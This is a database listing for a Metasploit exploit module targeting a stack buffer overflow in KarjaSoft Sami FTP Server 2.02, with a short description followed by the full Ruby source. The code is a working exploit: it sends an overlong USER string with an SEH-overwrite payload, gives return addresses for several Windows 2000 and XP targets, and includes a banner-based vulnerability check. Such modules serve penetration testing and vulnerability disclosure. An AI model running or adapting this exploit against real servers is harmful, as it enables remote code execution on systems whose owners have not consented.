KarjaSoft Sami FTP Server v2.02 USER Overflow

2008-03-17T14:23:01
ID MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_USER
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
      'Description'	=> %q{
          This module exploits the KarjaSoft Sami FTP Server version 2.02
        by sending an excessively long USER string. The stack is overwritten
        when the administrator attempts to view the FTP logs. Therefore, this exploit
        is passive and requires end-user interaction. Keep this in mind when selecting
        payloads. When the server is restarted, it will re-execute the exploit until
        the logfile is manually deleted via the file system.
      },
      'Author'	=> [ 'aushack' ],
      'Arch'		=> [ ARCH_X86 ],
      'License'	=> MSF_LICENSE,
      'Stance'	=> Msf::Exploit::Stance::Passive,
      'References'	=>
        [
          # This exploit appears to have been reported multiple times.
          [ 'CVE', '2006-0441'],
          [ 'CVE', '2006-2212'],
          [ 'OSVDB', '25670'],
          [ 'BID', '16370'],
          [ 'BID', '22045'],
          [ 'BID', '17835'],
          [ 'EDB', '1448'],
          [ 'EDB', '1452'],
          [ 'EDB', '1462'],
          [ 'EDB', '3127'],
          [ 'EDB', '3140']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Platform' 	=> ['win'],
      'Privileged'	=> false,
      'Payload'	=>
        {
          'Space'			=> 300,
          'BadChars'		=> "\x00\x0a\x0d\x20\xff",
          'StackAdjustment'	=> -3500,
        },
      'Targets' 	=>
        [
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
          [ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
        ],
      'DisclosureDate' => 'Jan 24 2006'))

    register_options(
      [
        Opt::RPORT(21),
      ])
  end

  def check
    connect
    banner = sock.get_once(-1, 3)
    disconnect

    if (banner =~ /Sami FTP Server 2\.0\.2/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)

    login = "USER #{sploit}\r\n"
    login << "PASS " + Rex::Text.rand_char(payload_badchars)

    sock.put(login + "\r\n")

    handler
    disconnect
  end
end